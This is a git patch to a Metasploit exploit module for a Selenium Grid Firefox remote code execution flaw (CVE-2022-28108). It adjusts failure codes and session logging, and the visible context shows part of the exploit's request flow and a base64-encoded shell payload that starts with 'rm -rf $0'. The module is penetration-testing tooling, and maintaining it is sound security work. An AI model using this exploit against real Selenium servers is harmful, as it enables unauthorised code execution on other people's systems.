From ec8dba87fbea942eddcc404d598f1341fcbf567a Mon Sep 17 00:00:00 2001
From: Takah1ro <tkhr.y0k0yama@gmail.com>
Date: Thu, 2 Jan 2025 11:30:03 +0900
Subject: [PATCH] Update failure and print about session id

---
 .../selenium_greed_firefox_rce_cve_2022_28108.rb | 16 ++++++++++++----
 1 file changed, 12 insertions(+), 4 deletions(-)

diff --git a/modules/exploits/linux/http/selenium_greed_firefox_rce_cve_2022_28108.rb b/modules/exploits/linux/http/selenium_greed_firefox_rce_cve_2022_28108.rb
index 01c3eedc78..32183846a2 100644
--- a/modules/exploits/linux/http/selenium_greed_firefox_rce_cve_2022_28108.rb
+++ b/modules/exploits/linux/http/selenium_greed_firefox_rce_cve_2022_28108.rb
@@ -138,10 +138,12 @@ class MetasploitModule < Msf::Exploit::Remote
       'headers' => { 'Content-Type' => 'application/json; charset=utf-8' },
       'data' => new_session
     }, datastore['TIMEOUT'])
-    fail_with(Failure::Unreachable, 'Connection failed.') unless res
+    fail_with(Failure::Unknown, 'Connection failed.') unless res
 
     session_id = res.get_json_document['value']['sessionId'] || res.get_json_document['sessionId']
-    fail_with(Failure::Unreachable, 'Failed to start session.') unless session_id
+    fail_with(Failure::Unknown, 'Failed to start session.') unless session_id
+
+    print_status("Started session (#{session_id}).")
 
     b64encoded_payload = Rex::Text.encode_base64(
       "rm -rf $0\n"\
@@ -161,12 +163,18 @@ class MetasploitModule < Msf::Exploit::Remote
     })
     # The server does not send a response, so no check here
 
-    send_request_cgi({
+    res = send_request_cgi({
       'method' => 'DELETE',
       'uri' => normalize_uri(target_uri.path, @version3 ? "wd/hub/session/#{session_id}" : "session/#{session_id}"),
       'headers' => { 'Content-Type' => 'application/json; charset=utf-8' }
     })
-    # The server does not send a response, so no check here
+    if res
+      print_status("Deleted session (#{session_id}).")
+    else
+      print_status("Failed to delete the session (#{session_id}). "\
+                   'You may need to wait for the session to expire (default: 5 minutes) or '\
+                   'manually delete the session for the next exploit to succeed.')
+    end
   end
 
 end